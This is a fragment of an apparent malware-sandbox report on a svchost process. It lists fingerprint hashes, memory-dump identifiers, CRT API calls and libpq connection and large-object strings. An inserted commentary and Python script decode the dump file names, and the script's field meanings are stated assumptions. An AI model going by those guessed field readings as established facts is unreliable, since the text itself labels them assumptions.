                                                                                            • Instruction ID: 8d87d456ef5ac181f92fbdd219d4066359fda4d9eb55b802f7f1e570d41f5126
                                                                                            • Opcode Fuzzy Hash: 6cfd3f1bd986bb4813897892ad6781e1333348a5243eecd47d0186c0da29410f
                                                                                            • Instruction Fuzzy Hash: 682140159AE16A8B9611E3F888A83AEEF408F5735CBC43F33D95C477408BCCCD419612
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                                                                                            • Instruction ID: 9358606cd1695a783c4c098ae4817f922bbcdb5f5d6e0a48e403a9552a2d042d
                                                                                            • Opcode Fuzzy Hash: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                                                                                            • Instruction Fuzzy Hash: 8FA1553671AB8282EB409F65D8642B92321FB88F95F0C1571CE4E5B376CF39D489C314
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: d8c961ebe3d96005e1e7cb12c024be23ded126365af48719a012c2dcda9bed48
                                                                                            • Instruction ID: b7dec439ced0ecbe3f419c54e9c6b113f702e0f900362b7b9c8425252f4a7f72
                                                                                            • Opcode Fuzzy Hash: d8c961ebe3d96005e1e7cb12c024be23ded126365af48719a012c2dcda9bed48
                                                                                            • Instruction Fuzzy Hash: 462141159AE16A8B9611E3F888A83AEEF408B4735CBC43F33D95C477818BCCCD455612
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6558b8c8933c0e36cb30fba0b2db9598aa34130188afadd4f445023fd4452698
                                                                                            • Instruction ID: 0fdfcdc734d7ace8ed8c737e2634af43f41844cb29366d9ddab5af152c8eb2a0
                                                                                            • Opcode Fuzzy Hash: 6558b8c8933c0e36cb30fba0b2db9598aa34130188afadd4f445023fd4452698
                                                                                            • Instruction Fuzzy Hash: 78611757A6D1568BE311B7F8D8543AEAF41D796319FC86A32D90CC73D0EAADCD42C201
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a241de8457207be6930be8d2d6a9e2710f79a7ebfbebfe2260c74af84ddae04c
                                                                                            • Instruction ID: e4d63cce666024b07f9ecd7fd5b0aa7191692adaa9c908989be0792d7255a48e
                                                                                            • Opcode Fuzzy Hash: a241de8457207be6930be8d2d6a9e2710f79a7ebfbebfe2260c74af84ddae04c
                                                                                            • Instruction Fuzzy Hash: AB417E129BE05A4BA211A7F45CA876FEF809B4779CBC03E33D91C47784CBADCD829605
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ea22d2773a379d4a85fa27f17693d0336c972e6f647331039f8f4a9fd4a2e7a
                                                                                            • Instruction ID: 337d000ac771031f01e877c59559def919b689d8d4ad366af12fae2953345046
                                                                                            • Opcode Fuzzy Hash: 8ea22d2773a379d4a85fa27f17693d0336c972e6f647331039f8f4a9fd4a2e7a
                                                                                            • Instruction Fuzzy Hash: 9641901297E05A4EA211ABF858A837EEF419B43369BC47F32DA5847391DBEDCC81C301
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abb85ffd75dfc4c51a1628734e1645f799ba93206ce970b32ae7857fff317970
                                                                                            • Instruction ID: 694fa6c9d4643f6d946a97a9f71ef78ebd9c9738f251591e168e293483714027
                                                                                            • Opcode Fuzzy Hash: abb85ffd75dfc4c51a1628734e1645f799ba93206ce970b32ae7857fff317970
                                                                                            • Instruction Fuzzy Hash: 5F51965297E0498AA21197F458A836EDF509B5736DFD43F33DA69473D0DBADCC81C201
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 18e5691760aaae4a02e7d207611ff62389cc034f305a815a953a0a764a8cdd22
                                                                                            • Instruction ID: ffdc7b6787f8aab1badcf005d9190fc0e98897cc595e7138c365454bb6ca6b33
                                                                                            • Opcode Fuzzy Hash: 18e5691760aaae4a02e7d207611ff62389cc034f305a815a953a0a764a8cdd22
                                                                                            • Instruction Fuzzy Hash: A551A51297D0494BA221A7F45CA436EEF51AB4736DBD43F33DA68473D4DBADCD828201
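The dump identifiers in the "Memory Dump Source" entries encode which process, dump pass and mapped image each region belongs to, and the snapshot file names (hcaresult_42_2_66000000_svchost.jbxd, hcaresult_42_2_7ffda36d0000_svchost.jbxd) repeat three of those fields in decimal and lowercase hex. The following is an added example, not part of the Joe Sandbox report or its tooling: it parses the dump names listed above, groups the associated regions per image and rebuilds that snapshot prefix as a consistency check. Only the PID and dump-index fields are confirmed by the page (0x2A = 42 and 2 reappear in the snapshot names); reading the fifth field as a Windows PAGE_* protection value, the seventh as a MEM_* region type and the last as a per-image module index is an assumption, labelled as such in the code.

```python
import re
from dataclasses import dataclass

# Windows constants from winnt.h. Reading field 5 of a dump name as a PAGE_*
# protection and field 7 as a MEM_* region type is an ASSUMPTION made for this
# example; it is consistent with every name on this page (code region 0x20,
# read-only data 0x02, writable data 0x04/0x08, all regions 0x1000000).
PAGE_PROTECT = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# <pid>.<dump>.<seq>.<base>.<protect>.<flag>.<type>.<module>.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<dump>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<flag>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<module>[0-9A-F]{8})\.sdmp$", re.IGNORECASE)


@dataclass(frozen=True)
class Sdmp:
    pid: int        # 0x2A = 42, matches "hcaresult_42_..." in the snapshot name
    dump: int       # 2, matches "..._42_2_..." in the snapshot name
    seq: int        # increases across the regions of one dump (assumed)
    base: int       # region base address
    protect: int    # PAGE_* value (assumed)
    flag: int       # always 1 on this page; meaning not known
    mem_type: int   # MEM_* value (assumed)
    module: int     # shared by all regions of one mapped image (assumed)

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")


def parse_sdmp(name: str) -> Sdmp:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return Sdmp(int(m["pid"], 16), int(m["dump"], 16), int(m["seq"]),
                int(m["base"], 16), int(m["protect"], 16), int(m["flag"], 16),
                int(m["type"], 16), int(m["module"], 16))


def group_by_image(names) -> dict[tuple[int, int], list[Sdmp]]:
    """Group dumps by (pid, module index); each group is sorted by base address."""
    groups: dict[tuple[int, int], list[Sdmp]] = {}
    for n in names:
        d = parse_sdmp(n)
        groups.setdefault((d.pid, d.module), []).append(d)
    for g in groups.values():
        g.sort(key=lambda d: d.base)
    return groups


def snapshot_prefix(group: list[Sdmp]) -> str:
    """Rebuild the 'hcaresult_<pid>_<dump>_<imagebase>' prefix of the IDA
    snapshot file; the image base is the lowest region base in the group."""
    first = group[0]
    return f"hcaresult_{first.pid}_{first.dump}_{first.base:x}"


def executable_regions(group: list[Sdmp]) -> list[Sdmp]:
    """Regions with any PAGE_EXECUTE* bit set: the fingerprinted code lives here."""
    return [d for d in group if d.protect & 0xF0]


# Dump names taken verbatim from the entries above (PID 0x2A, dump 2).
SAMPLE_DUMPS = [
    "0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp",
    "0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp",
]

if __name__ == "__main__":
    for key, group in group_by_image(SAMPLE_DUMPS).items():
        print(snapshot_prefix(group), "module", hex(key[1]))
        for d in group:
            print(f"  {d.base:016X} {d.protect_name:<24} {d.type_name}")
```

Run stand-alone, it lists the two images of process 42 with their regions and decoded protections. Under the stated assumption, each image has exactly one PAGE_EXECUTE_READ region (base 66001000 and 7FFDA36D1000), and those are the regions named in the "Source File" lines of the fingerprint entries, which is where the opcode and instruction hashes above were taken from.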
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID: abort
• String ID:
• API String ID: 4206212132-0
• Opcode ID: 29ef229ea1c0d00c17e05e61b70288c5814ac060b99a7c25f25aa1e0e69b4c84
• Instruction ID: eda0982c2952a9a802fe652290a126da01fdf19940dd64b9a0f166618374c4d2
• Opcode Fuzzy Hash: 29ef229ea1c0d00c17e05e61b70288c5814ac060b99a7c25f25aa1e0e69b4c84
• Instruction Fuzzy Hash: FE514CA256D1954FE211D7F898A836FBF519B1334CBC02E32DA69477C0DAAECC42C721
APIs
• Part of subcall function 00007FFDA36D8370: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36DA885,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D8382
• _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFDA36D5228), ref: 00007FFDA36D849A
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA36D5228), ref: 00007FFDA36D84C7
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA36D5228), ref: 00007FFDA36D84DB
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: free$_strdupmalloc
• String ID: 1$=$invalid connection option "%s"$missing "=" after "%s" in connection info string$out of memory$prefer$require$requiressl$sslmode$unterminated quoted string in connection info string
• API String ID: 111713529-5897758
• Opcode ID: e8a365f9cffea4c3eeff60c20e8e343235bdf29771b951907f6b63c2a3cd0336
• Instruction ID: 0923c65a7a1f77a265d5ef84f7a05cb65dbf3c8946aabbdd07e1228d5292c6c8
• Opcode Fuzzy Hash: e8a365f9cffea4c3eeff60c20e8e343235bdf29771b951907f6b63c2a3cd0336
• Instruction Fuzzy Hash: 4CC19F12B0FA9685FB518B2294383B92792AF05FC4F4C6471CA4E6B397DE3EE445C358
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81229fecc24b067ea88d046a344f246caa5a6082d2b12f0638a9598128be766e
• Instruction ID: 3ae960784052259f68836a92b6ea440df88694ff670b60e23fc08fce96eb43a3
• Opcode Fuzzy Hash: 81229fecc24b067ea88d046a344f246caa5a6082d2b12f0638a9598128be766e
• Instruction Fuzzy Hash: 5DA1D03225DB458BE210DFA5E88475EBBA4FB86B98F815632EEA943744CF3DC851C740
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID: abort
• String ID:
• API String ID: 4206212132-0
• Opcode ID: a664d7ad1bf174364580892af68237473766951aeb5b38876afadbe87ab5ddf1
• Instruction ID: d0b1ef4228df365b1d52f9df911d764cf1a668cc10f66dbc33eca963423bb4af
• Opcode Fuzzy Hash: a664d7ad1bf174364580892af68237473766951aeb5b38876afadbe87ab5ddf1
• Instruction Fuzzy Hash: 4231A32266E0554BE214A7FC98A83AEEF41CB87398BC47F33DA5C477C4DA9CCD818111
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID:
• String ID: cannot determine OID of function %s$lo_close$lo_creat$lo_create$lo_lseek$lo_lseek64$lo_open$lo_tell$lo_tell64$lo_truncate$lo_truncate64$lo_unlink$loread$lowrite$out of memory$query to initialize large object functions did not return data$select proname, oid from pg_catalog.pg_proc where proname in ('lo_open', 'lo_close', 'lo_creat', 'lo_create', 'lo_unlink', 'lo_lseek', 'lo_lseek64', 'lo_tell', 'lo_tell64', 'lo_truncate', 'lo_truncate64', 'loread', 'lowrite') and pronamespace = (select oid fro
• API String ID: 0-3822070938
• Opcode ID: 3bd6c99e676938b7085dfb915d1f755ebe87c391fc0eab0a9fd4b6a6e3a3b429
• Instruction ID: 3123d59baa4703b0daec54c1c6d0b064df588f6851887c9d37bdcc6f0e2d3e5f
• Opcode Fuzzy Hash: 3bd6c99e676938b7085dfb915d1f755ebe87c391fc0eab0a9fd4b6a6e3a3b429
• Instruction Fuzzy Hash: 52C18D62B0F64686FA208B21D4301B963A3EF55B84F6C7135D90E26397EF7EE158D708
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b681729c5e79879584a3963ac308c5ae251d2ca0c77102b9d37f02dd63d37db
• Instruction ID: b5b9b8ff40cf44f46394f824c180200da0c7daba8bd9d54ff503ed906d01fb9e
• Opcode Fuzzy Hash: 1b681729c5e79879584a3963ac308c5ae251d2ca0c77102b9d37f02dd63d37db
• Instruction Fuzzy Hash: 305101722596058AE7109FB5988475EBF64FB86B9CF806A32DE2C47384CF78CC41D244
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID: abort
• String ID:
• API String ID: 4206212132-0
• Opcode ID: 63682c602be7e039b7e69b245d11a7e1a7aefea3a1e3f4ff280d37df522ed05a
• Instruction ID: 39f253af199c0721dd0a841c389f06245f4c91b1f3426234885be84ee1a888d9
• Opcode Fuzzy Hash: 63682c602be7e039b7e69b245d11a7e1a7aefea3a1e3f4ff280d37df522ed05a
• Instruction Fuzzy Hash: 4C21F7424AE0AA4F9211A3F84CA836EAF108B5731DBC83F73E56C47392CB8DCD509651
APIs
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D7FA4
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00007FFDA36D7FB8
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8064
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8078
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8094
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D80A8
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8152
• _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D815C
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8194
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D81A8
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D81B6
• _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D81BF
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8204
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8218
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8247
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D825B
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8284
